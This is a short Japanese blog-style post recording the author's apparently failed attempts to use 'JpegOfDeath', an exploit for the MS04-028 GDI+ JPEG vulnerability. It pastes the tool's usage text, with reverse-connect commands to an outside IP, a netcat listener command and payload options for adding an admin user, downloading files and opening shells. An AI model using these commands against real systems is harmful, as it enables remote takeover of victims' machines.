MS04-028のコネクトバックもの
例のGDI+の脆弱性のExploitでコネクトバックさせるJpegを生成するものでがリリース。bオプションにするとExplorerが落ちたけど-rでコネクトバックをするJpegを生成したが
うんともすんとも言わなかった…。
何か間違ってるのかなぁ…。
それとも日本語OSではだめ?
英語版がないので検証断念。# 英語版どこかにあるはずだから探そうかなぁ…
# これからの検証用にも欲しいし。追記:
C:\>jpegOfdeath.exe
+------------------------------------------------+
| JpegOfDeath - Remote GDI+ JPEG Remote Exploit |
| Exploit by John Bissell A.K.A. HighT1mes |
| September, 23, 2004 |
+------------------------------------------------+
Exploit Usage:
jpegOfdeath.exe -r your_ip | -b [-p port]
Parameters:
-r your_ip or -b Choose -r for reverse connect attack mode
and choose -b for a bind attack. By default
if you don't specify -r or -b then a bind
attack will be generated.
-p (optional) This option will allow you to change the port
used for a bind or reverse connect attack.
If the attack mode is bind then the
victim will open the -p port. If the attack
mode is reverse connect then the port you
specify will be the one you want to listen
on so the victim can connect to you
right away.
Examples:
jpegOfdeath.exe -r 68.6.47.62 -p 8888 test.jpg
jpegOfdeath.exe -b -p 1542 myjpg.jpg
jpegOfdeath.exe -b whatever.jpg
jpegOfdeath.exe -r 68.6.47.62 exploit.jpg
Remember if you use the -r option to have netcat listening
on the port you are using for the attack so the victim will
be able to connect to you when exploited...
Example:
nc.exe -l -p 8888
Add User X with Pass X to Admin Group;
Download a File From an HTTP Server
Send Back a Shell To a Specified IP on a Specific Port
Bind a Shell on The Exploited Machine On a Specific Port
上記のオプションが使えるようになったAll in Oneのがでたけど
相変わらずコネクトバックやらはできず…
画像をいじりまくってたらブルースクリーンに。